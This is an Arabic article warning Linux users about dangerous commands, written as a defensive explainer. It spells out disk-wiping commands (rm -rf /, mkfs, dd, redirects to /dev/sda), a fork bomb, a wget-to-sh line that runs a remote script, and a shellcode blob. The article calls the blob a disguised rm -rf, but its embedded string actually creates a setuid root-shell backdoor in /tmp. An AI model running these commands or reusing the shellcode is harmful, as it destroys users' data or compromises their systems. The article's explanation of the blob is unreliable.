أوامر مميتة لنظام لينوكس يجب عدم السماح بتنفيذها

تعتبر الأوامر في نظام اللينوكس Linuux قوية حيث لا يسألك لينوكس Linux من أجل تأكيد قيامك بالأمر في حال كان ذلك الأمر يضر بالنظام ، و إنه من غير المستغرب أن يقوم بعض الأشخاص بإغراء مستخدمي لينوكس الجدد من أجل تجربة بعض الأوامر الخطرة على سبيل المزاح فقط .

لذلك سنتحدث في هذه المقالة عن أخطر الأوامر في لينوكس و التي عليك عدم تنفيذها وعدم السماح بتنفيذ أي سكريبت Script يحتوي عليها .
مع الانتباه أن هذه المقالة ليست دليلاً تفصيليا عن تلك الأوامر حيث يمكن إعادة صياغة هذه الأوامر بطرق مختلفة .

يجب التنويه إلى أن العديد من هذه الأوامر لا تشكل خطراً إلا إذا سبقت ب sudo في نظام أوبينتو Ubuntu – حيث لا تعمل إلا بهذا الشكل – ، في باقي توزيعات لينوكس فإن معظم هذه الأوامر تتطلب صلاحيات الروت من أجل العمل .

الأمر : / rm -rf : يحذف كل شيء :

إن الأمر السابق يقوم بحذف كل شيء يمكن حذفه بما في ذلك الملفات على القرص الصلب و الملفات على أجهزة الوسائط القابلة للإزالة و المتصلة بالجهاز .

الشرح : 

rm : قم بحذف الملفات التالية .

rf- : قم بتشغيل الأمر rm  بشكل متكرر ( لحذف كل الملفات و المجلدات داخل مجلد محدد ) مع الإجبار على حذف جميع الملفات دون تحذيرك .

– : و تعني هذه الفاصلة تنفيذ الأمر rm على المجلد الأصل روت root و الذي يحوي جميع الملفات على الحاسوب و على أجهزة الوسائطة بما في ذلك الملفات المشاركة عن بعد و الملفات في الأجهزة القابلة للإزالة .

يمكن استخدام الأمر السابق بطرق أخرى فمثلا الأمر “~ rm –rf ” سيقوم بحذف كل الملفات في المجلد الرئيسي الهوم بينما الأمر *.rm -rf سيقوم بحذف جميع ملفات التهيئة .

اشكال مخفية من الأمر / rm -rf 

الكود التالي هو الشكل العشري للأمر السابق و له نفس العمل لذلك يجب الانتباه و عدم تنفيذ أي كود لا تفهمه :

 char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”

“\x6e\x2f\x73\x68\x00\x2d\x63\x00”

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

:(){ :|: & };: الأمر

يبدو الأمر السابق بسيطاً و لكنه خطير حيث يقوم بتعريف دالة تقوم باستنساخ نفسها ، و تستمر عمليات النسخ مما يؤدي إلى تكاثر هذه الدالة بشكل مستمر مما يؤدي إلى استهلاك كامل قدرة المعالج المركزي CPU و الذاكرة ، و يمكن أن تؤدي في النهاية إلى تجميد نظام التشغيل ،

لذلك إن أوامر الاستنساخ قوية رغم أنها قصيرة جداً

الأمر mkfs.ext4 /dev/sda1

إن الأمر السابق سهل للفهم حيث يعبر :

mkfs.ext4 : إنشاء نظام ملفات جديد من النوع ext4 على القرص الصلب التالي لهذا الأمر .

/dev/sda1 : تحديد القسم الأول ( القرص ) على الهارد الأول على جهازك و الذي من المحتمل أن يكون قيد الاستخدام .

يمكن تقريب الأمر السابق كالقيام بفرمتة القرص المحلي C في ويندوز Windows حيث سيقوم بمسح جميع الملفات على أول الأقراص المحلية و يستبدلها بنظام ملفات جديد .

يمكن للأمر السابق أن يكون بأشكال أخرى مثل : mkfs.ext3 /dev/sdb2 و الذي سيؤدي إلى فرمتة القرص المحلي الثاني على الهارد الثاني بنظام ملفات من النوع ext3 . 

يجب الانتباه من تشغيل أوامر على الهارد ديسك و التي تبدأ ب /dev/sd   .

الأمر command > /dev/sda :

يقوم الأمر السابق بتنفيذ أمر ما و يرسل مخرجات هذا الأمر مباشرة إلى أول قرص صلب على جهازك ،ويقوم بكتابة البيانات مباشرة على القرص الصلب و يخرب ملفات النظام .

 command يعني تشغيل أمر ما ( يمكن أن يكون أي أمر ) 

> : إرسالة مخرجات الأمر السابق إلى المسار التالي لها   

/dev/sda : كتابة مخرجات الأمر السابق مباشرة على القرص الصلب .

الأمر dd if=/dev/random of=/dev/sda

سيقوم سطر الأوامر السابق بمسح البيانات من أحد الأقراص الصلبة .

dd : إنجاز نسخ منفخض المستوى من موقع إلى آخر . 

if=/dev/random : استخدام  /dev/random ( بيانات عشوائية ) كبيانات إدخال ، يمكن أحيانا رؤية مواقع مثل /dev/zero ( أصفار ) .

of=/dev/sda : كتابة بيانات الإخراج على أول قرص صلب مع استبدال ملفات النظام ببيانات عشوائية لا قيمة منها .

إن الأمر dd يقوم بنسخ البيانات من موقع إلى آخر و هذا الأمر يمكن أن يكون خطراً إذا ما قمت بالنسخ بشكل مباشرة إلى القرص الصلب .

الأمر mv ~ /dev/null :

/dev/null هو مكان آخر خاص حيث إن نقل ملف ما إلى المسار /dev/null يعني تحطيمه ، يمكن تشبيه الموقع /dev/null كحفرة سوداء و لذلك فإن الأمر mv ~ /dev/null يعني إرسال كل ملفاتك الشخصية إلى حفرة سوداء .

mv : نقل الملف أو المسار التالي إلى مكان آخر

~ : تمثل كامل المجلد الرئيسي ( الهوم ) . 

/dev/null : نقل المجلد الرئيسي ( الهوم ) إلى /dev/null و تحطيم كل الملفات التي بداخله مع حذف النسخة الأصلية . 

الأمر wget http://example.com/something -O – | sh

يعني سطر الأوامر السابق تحميل ملف سكريبت script من الويب ثم إرساله إلى sh و الذي يقوم بتنفيذ محتويات هذا السكريبت ، هذا الأمر يمكن أن يكون خطراً في حال لم تكن متأكد من السكريبت الذي قمت بتحميله أو أن أنك لا تثق بالمصدر .

wget : تحميل ملف

http://example.com/something : ( هذا مثال فقط ) حمل الملف من هذا المكان حيث يكتب مسار الملف كاملاً  .

| : أرسل الملف المحمل مباشرة إلى أمر أخر .

sh : أرسل الملف إلى الأمر sh و الذي سيقوم بتنفيذه في حال كان ملف سكريبت ..

يجب عدم القيام بتنفيذ أي سكريبت غير معروف المصدر .

كانت هذه أبرز الأوامر الخطرة في نظام لينوكس Linux ، إذا كنت تعرف أي أوامر خطرة أخرى فلا تبخل في نشرها من خلال تعليق …